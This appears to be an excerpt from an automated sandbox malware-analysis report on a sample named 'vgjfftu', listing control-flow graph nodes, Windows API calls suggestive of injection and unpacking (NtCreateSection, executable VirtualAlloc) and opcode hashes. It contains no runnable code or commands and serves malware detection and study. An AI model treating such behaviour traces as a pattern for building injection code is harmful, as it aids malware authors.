                    control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                    • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                    • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                    • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 537 99bbb6-99bbf0 call 99bec9 540 99bc3e 537->540 541 99bbf2-99bc25 VirtualAlloc call 99bc43 537->541 540->540 543 99bc2a-99bc3c 541->543 543->540
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0099BC07
                    Memory Dump Source
                    • Source File: 00000008.00000002.476562400.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Offset: 00999000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_999000_vgjfftu.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 59a2aa76e8f13c5bbac39cc132c81a9d40ce4580c7c473154537a1caf06c493e
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: ED113C79A00208EFDB01DF98CA85E98BBF5AF48351F0580A4F9489B362D775EA50DF90
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                    • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                    • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                    • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                    • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                    • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                    • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                    • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                    • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                    • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                    • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                    • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                    • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                    • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                    • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                    • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                    APIs
                    • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                    Memory Dump Source
                    • Source File: 00000008.00000002.476519911.000000000040B000.00000020.00000001.01000000.0000000C.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_40b000_vgjfftu.jbxd
                    Similarity
                    • API ID: AllocLocal
                    • String ID:
                    • API String ID: 3494564517-0
                    • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                    • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                    • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                    • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                    APIs
                    • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                    • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                    • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                    Memory Dump Source
                    • Source File: 00000008.00000002.476519911.000000000040B000.00000020.00000001.01000000.0000000C.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_40b000_vgjfftu.jbxd
                    Similarity
                    • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                    • String ID:
                    • API String ID: 2776817195-0
                    • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                    • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                    • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                    • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                    APIs
                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.476519911.000000000040B000.00000020.00000001.01000000.0000000C.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_40b000_vgjfftu.jbxd
                    Similarity
                    • API ID: BuildCommEnvironmentFreeStrings
                    • String ID: -
                    • API String ID: 2991353152-2547889144
                    • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                    • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                    • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                    • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797